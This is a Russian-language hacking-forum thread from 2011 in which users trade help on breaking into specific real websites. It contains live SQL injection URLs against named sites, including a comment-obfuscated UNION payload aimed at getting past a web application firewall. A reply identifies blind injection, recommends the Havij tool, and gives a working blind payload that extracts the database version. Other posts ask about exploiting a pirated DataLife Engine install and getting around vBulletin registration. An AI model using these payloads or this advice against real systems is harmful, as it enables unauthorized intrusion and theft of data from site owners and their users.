ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.08.2011, 19:28
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Faaax
Faaax said:
Код:
Code:
http://www.unistream.ru/press/detail.php?ID=18667
помогите кто нить раскрутить!
4 ветка,но фильтруется пробел,кавычка,коментарии! Покажи мне запросы по которым ты определил что там скуля
|
|
|
14.08.2011, 19:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от Konqi
Konqi said:
Покажи мне запросы по которым ты определил что там скуля
через BENCHMARK определил,но уже пишет форбиденн
|
|
|
|
14.08.2011, 19:54
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Konqi
Konqi said:
Покажи мне запросы по которым ты определил что там скуля
int или intval в скрипте убери, тогда увидешь
|
|
|
|
14.08.2011, 20:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от попугай
попугай said:
int или intval в скрипте убери, тогда увидешь
в каком скрипте?
|
|
|
|
14.08.2011, 20:34
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Faaax
Faaax said:
в каком скрипте?
В этом параметре нету уязвимости. =\
|
|
|
|
15.08.2011, 11:45
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
ошибка на гл странице dle сайт
Код:
Code:
Deprecated: Function ereg() is deprecated in [PATH]/engine/modules/register.php on line 41
можно ли что то извлеч? или узнать версию?
стоит нулл
Сообщение от None
DataLife Engine Nulled by M.I.D-Team (http://www.mid-team.ws)
примерно версии середины лета 2009 года (точно хз не работал с dle) |
|
|
|
15.08.2011, 11:49
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Нет.
|
|
|
|
15.08.2011, 12:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
33429
Репутация:
0
|
|
WAF help please
http://www.pampling.com/ficha_producto.php?id_producto=27%27+/*!union*/+select+1,2,3,4+--+
|
|
|
|
15.08.2011, 12:55
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
есть форум на vbulletin. На почту не приходит уведомление для реги,тобишь группы нереал посмотреть. Есть ли альтернативный способ, допустим узнать имя любой группы, либо создать её?
|
|
|
|
15.08.2011, 12:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от oODungVTOo
oODungVTOo said:
WAF help please
http://www.pampling.com/ficha_producto.php?id_producto=27%27+/*!union*/+select+1,2,3,4+--+
blind sql inj. Фильтруется union. Версия 4-я. Так что тут особо ловить нечего. Юзай проги типа хавиджа, они те и раскрутят скулю и попробуют подобрать по словарю имён таблиц и колонок.
пример скули:
Код:
Code:
http://www.pampling.com/ficha_producto.php?id_producto=26+and+1=(select+if(ascii(substr(version(),1))=52,1,0))--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
